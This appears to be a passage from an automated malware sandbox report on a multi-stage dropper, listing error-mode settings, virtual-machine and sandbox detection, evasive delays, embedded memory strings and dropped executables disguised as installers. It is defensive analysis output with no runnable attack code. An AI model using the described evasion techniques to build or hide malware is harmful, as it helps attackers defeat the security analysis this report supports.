                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Checks if the current machine is a virtual machine (disk enumeration)
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                    Source: Ca4kQMpVXP8DY5HQ8cbuvFmH.exe, 00000019.00000002.2841566449.00000000004EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKBA
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 2C8B8140000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 2C8D1AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 7CD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 74D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 82D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 92D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: A6C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B6C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: CD00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: DD00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: ED00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 92D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: A2D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 7CD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,16_2_00401B4B
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,17_2_00401B4B
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,17_2_009BFF9D
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 300000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599746Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599007Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598755Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596575Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596381Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596136Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596026Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595920Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595779Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595667Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595558Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595426Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595200Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594987Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594691Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594214Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594065Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593584Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593326Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593202Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593090Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592980Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592522Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592387Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592264Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592003Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591656Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 4630Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 963Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1635Jump to behavior
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853491\opera_packageJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\EaLGCYiRQM2XOtVzyy0ADczF.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530026645880.dllJump to dropped file
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC1CE.tmp\INetC.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\t9y8ObbFiYcOWDbXePjVCsko.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\xgPBlpX67jxMBR1TQvyDxw3Z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-TSKOF.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\Pictures\tX8EOAwWEHtskvnslQFfJ9Qi.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Opera_108.0.5067.24_Autoupdate_x64[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libvorbis-0.dll (copy)Jump to dropped file
